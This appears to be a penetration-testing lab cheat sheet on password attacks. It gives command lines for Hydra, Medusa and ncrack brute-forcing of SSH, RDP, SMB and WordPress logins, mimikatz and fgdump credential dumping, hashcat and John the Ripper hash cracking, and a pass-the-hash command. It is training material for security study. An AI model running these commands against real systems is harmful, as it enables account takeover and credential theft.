-
AES Decryption http://aesencryption.net/
-
Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do \ curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \ done
-
Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict -
Default Usernames and Passwords
-
Government Security - Default Logins and Passwords for Networked Devices
-
http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php
-
Virus.org http://www.virus.org/default-password/
-
Default Password http://www.defaultpassword.com/
-
Brute Force
-
Nmap Brute forcing Scripts https://nmap.org/nsedoc/categories/brute.html
-
Nmap Generic auto detect brute force attack:
nmap --script brute -Pn <target.com or ip> -
MySQL nmap brute force attack:
nmap --script=mysql-brute $ip
-
-
Dictionary Files
- Word lists on Kali
cd /usr/share/wordlists
- Word lists on Kali
-
Key-space Brute Force
-
crunch 6 6 0123456789ABCDEF -o crunch1.txt -
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -
crunch 8 8 -t ,@@^^%%%
-
-
Pwdump and Fgdump - Security Accounts Manager (SAM)
-
pwdump.exe- attempts to extract password hashes -
fgdump.exe- attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.
-
-
Windows Credential Editor (WCE)
- allows one to perform several attacks to obtain clear text
passwords and hashes. Usage:
wce -w
- allows one to perform several attacks to obtain clear text
passwords and hashes. Usage:
-
Mimikatz
- extract plaintexts passwords, hash, PIN code and kerberos
tickets from memory. mimikatz can also perform
pass-the-hash, pass-the-ticket or build Golden tickets
https://github.com/gentilkiwi/mimikatz
From metasploit meterpreter (must have System level access):
meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords
- extract plaintexts passwords, hash, PIN code and kerberos
tickets from memory. mimikatz can also perform
pass-the-hash, pass-the-ticket or build Golden tickets
https://github.com/gentilkiwi/mimikatz
From metasploit meterpreter (must have System level access):
-
Password Profiling
- cewl can generate a password list from a web page
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
- cewl can generate a password list from a web page
-
Password Mutating
- John the ripper can mutate password lists
nano /etc/john/john.conf
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
- John the ripper can mutate password lists
nano /etc/john/john.conf
-
Medusa
- Medusa, initiated against an htaccess protected web
directory
medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
- Medusa, initiated against an htaccess protected web
directory
-
Ncrack
- ncrack (from the makers of nmap) can brute force RDP
ncrack -vv --user offsec -P password-file.txt rdp://$ip
- ncrack (from the makers of nmap) can brute force RDP
-
Hydra
-
Hydra brute force against SNMP
hydra -P password-file.txt -v $ip snmp -
Hydra FTP known user and rockyou password list
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp -
Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh -
Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh -
Hydra SSH Against Known username on port 22
hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt -
Hydra POP3 Brute Force
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V -
Hydra SMTP Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V -
Hydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin -
Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip -
Hydra brute force SMB user with rockyou:
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb -
Hydra brute force a Wordpress admin login
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
-
-
Online Password Cracking https://crackstation.net/ http://finder.insidepro.com/
-
Hashcat Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.
apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-devand
apt-get install pocl-opencl-icd
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
Create a .hash file with all the hashes you want to crack
puthasheshere.hash:
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
Hashcat example cracking Linux md5crypt passwords
hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt
Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/
Wordpress clear text: test
`hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`
-
Sample Hashes http://openwall.info/wiki/john/sample-hashes
-
Identify Hashes
hash-identifier -
To crack linux hashes you must first unshadow them:
unshadow passwd-file.txt shadow-file.txtunshadow passwd-file.txt shadow-file.txt > unshadowed.txt -
John the Ripper - Password Hash Cracking
-
john $ip.pwdump -
john --wordlist=/usr/share/wordlists/rockyou.txt hashes -
john --rules --wordlist=/usr/share/wordlists/rockyou.txt -
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt -
JTR forced descrypt cracking with wordlist
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt -
JTR forced descrypt brute force cracking
john --format=descrypt hash --show
-
-
Passing the Hash in Windows
-
Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896pth-winexe -U administrator //$ip cmd
-
fcrackzip -v -b -D -p rockyou.txt -u ./backup.zip